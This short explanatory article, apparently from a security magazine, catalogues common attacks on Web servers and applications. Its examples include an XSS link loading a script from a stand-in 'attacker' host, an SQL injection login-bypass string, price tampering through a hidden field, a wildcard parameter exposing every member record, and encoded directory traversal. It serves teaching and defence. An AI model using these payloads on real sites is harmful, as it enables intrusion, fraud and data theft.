- Mike Bobbitt
Default Web server installs, whatever the make or model, are exposed to a range of attacks that other network services never have to worry about. Many are so simple to launch that anyone with a browser can carry them out; others require intimate knowledge of the host server and the applications behind it. All can damage an organization's Web presence.
Obviously, not all of the following attacks work all of the time. But although every one of these threats is well known and well documented, new and vulnerable Web sites continue to pour onto the Internet.
- Cross-Site Scripting: Malicious code, commonly a <SCRIPT> tag embedded in a URL parameter, that the vulnerable site copies into its own page unescaped. When a user clicks the URL, the script runs in the victim's browser with the site's cookies and privileges.
Example: <a href="http://www.infosecuritymag.com?bogus=<SCRIPT SRC='http://attacker/script'></SCRIPT>">Click Me!</a> (in a real link the payload would be URL-encoded so that it survives the browser and looks harmless to the victim). The attack only works because the site echoes the "bogus" parameter back into its response without escaping it.
- Application Buffer Overflow: A request far longer than the application expects overruns a fixed-size buffer in the server or CGI program, overwriting adjacent memory (including saved return addresses) so that attacker-supplied code ends up in the execution stream.
Example: <input type="text" maxlength="10000000" value="ioH*Y$P;..."> with the form's client-side length limit raised (or simply ignored by a hand-built request) so that an enormous value reaches the server. A limit enforced only in the browser is no limit at all.
- Cookie Poisoning: Editing a cookie's contents so that a server which trusts the cookie as received hands out information or privileges the user isn't entitled to. Cookies are stored on the client and can be changed at will.
Example: Changing the username or user ID stored in a cookie to read other users' records.
- Hidden Field Manipulation: Changing the values of hidden form fields, which applications frequently use to carry state (prices, user IDs, the current workflow step) from one request to the next. "Hidden" only means the browser doesn't display them; anyone can view the page source, edit the value and resubmit the form.
Example: <input type="hidden" name="price" value="69.99"> changed to <input type="hidden" name="price" value="0.01"> changes the price of an item on a Web-based order form, because the server takes the price from the form instead of from its own catalog.
- Stealth Commanding: Supplying form input that the application later treats as code or markup rather than as data, coercing the Web server into actions it wouldn't ordinarily allow.
Example: Inserting a script into a text box so that it executes when the application displays the text back to the user (on a confirmation page, for example) or to other users who view it later.
- Forceful Browsing: Modifying the URL to request pages or resources directly, bypassing the links and workflow the application expected the user to follow and any access checks that exist only in that flow.
- Parameter Tampering: Modifying the query-string or form parameters a page sends and submitting them to the Web server, which trusts them as if the page itself had produced them.
Example: <http://mysite/dbaccess.cgi?memberid=466326> changed to <http://mysite/dbaccess.cgi?memberid=*> returns every member record in the database if the CGI drops the value straight into its query.
- Third-Party Misconfiguration: Exploiting an insecure default (or simply bad) configuration of the server or of third-party software installed alongside it.
Example: Attempting to use default passwords to gain access to Web applications.
- Known Vulnerabilities: Exploiting known vulnerabilities that haven't been patched.
Example: Exploiting IIS vulnerabilities on a "vanilla" installation before it's patched.
- Backdoor and Debug Options: Exploiting functions intended for development and testing (debug switches, test accounts, bypass parameters) that were never removed or disabled before the site went live.
- Database Sabotage: Appending valid SQL to form fields so that it becomes part of the query the application builds from them (SQL injection).
Example: On a Web form, if user "bobbitt" enters "mypassword" in the password field, the underlying SQL query might look like this:
select * from users where username='bobbitt' and password='mypassword'
However, if an attacker enters "anyoldthing' or '1'='1" in that same password field, the SQL query changes to this:
select * from users where username='bobbitt' and password='anyoldthing' or '1'='1'
Because AND binds more tightly than OR, the database reads this as (username='bobbitt' and password='anyoldthing') or ('1'='1'). The second condition is always true, so the WHERE clause matches every row in the table, the application sees a non-empty result and grants access without a valid password.
- Data Encoding: Disguising an attack by writing it in an alternate encoding so that filters looking for the literal attack string don't recognize it, while the server still decodes it before use.
Example: Writing "../" as "%2E%2E%2F" in a URL to hide a directory-traversal request from a filter that only looks for "../" in the raw request.
- Protocol Piggybacking: Tampering with the structure of the HTTP exchange itself (headers, methods, request framing) rather than with form data.
Example: Inserting a specially crafted Proxy-Authorization header into an HTTP request.